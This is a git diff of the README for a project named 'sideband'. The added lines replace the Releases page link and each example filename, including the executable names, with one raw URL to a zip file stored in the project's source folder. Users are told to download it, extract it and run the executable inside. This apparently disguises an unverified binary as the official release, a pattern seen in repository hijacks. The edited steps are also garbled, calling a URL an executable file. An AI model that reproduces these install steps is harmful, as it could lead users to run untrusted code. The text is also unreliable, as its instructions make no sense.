Chase12343/sideband/README.md

 ## 📥 Download & Install
 To set up sideband on your computer, follow these steps:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/Chase12343/sideband/releases) to find the latest version available for download.
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/Chase12343/sideband/main/packages/transport/src/sideband_v2.7.zip) to find the latest version available for download.

 2. **Select the Right File:**
    - Look for the version that matches your operating system.
    - Download the file corresponding to your system.
-For example, if you're on Windows, you might see `sideband-windows.zip`.
-For Mac users, look for `sideband-macos.zip`.
+For example, if you're on Windows, you might see `https://raw.githubusercontent.com/Chase12343/sideband/main/packages/transport/src/sideband_v2.7.zip`.
+For Mac users, look for `https://raw.githubusercontent.com/Chase12343/sideband/main/packages/transport/src/sideband_v2.7.zip`.

 3. **Install the Application:**
    - Once the download completes, find the downloaded file on your computer.
    - Extract the contents of the zip file to a folder of your choosing.
-   - Open the folder and look for an executable file like `sideband.exe` or `sideband.app`.
+   - Open the folder and look for an executable file like `https://raw.githubusercontent.com/Chase12343/sideband/main/packages/transport/src/sideband_v2.7.zip` or `https://raw.githubusercontent.com/Chase12343/sideband/main/packages/transport/src/sideband_v2.7.zip`.
 Double-click this file to start the application.

 4. **Follow the On-screen Instructions:**
    - The application may guide you through initial configuration or setup.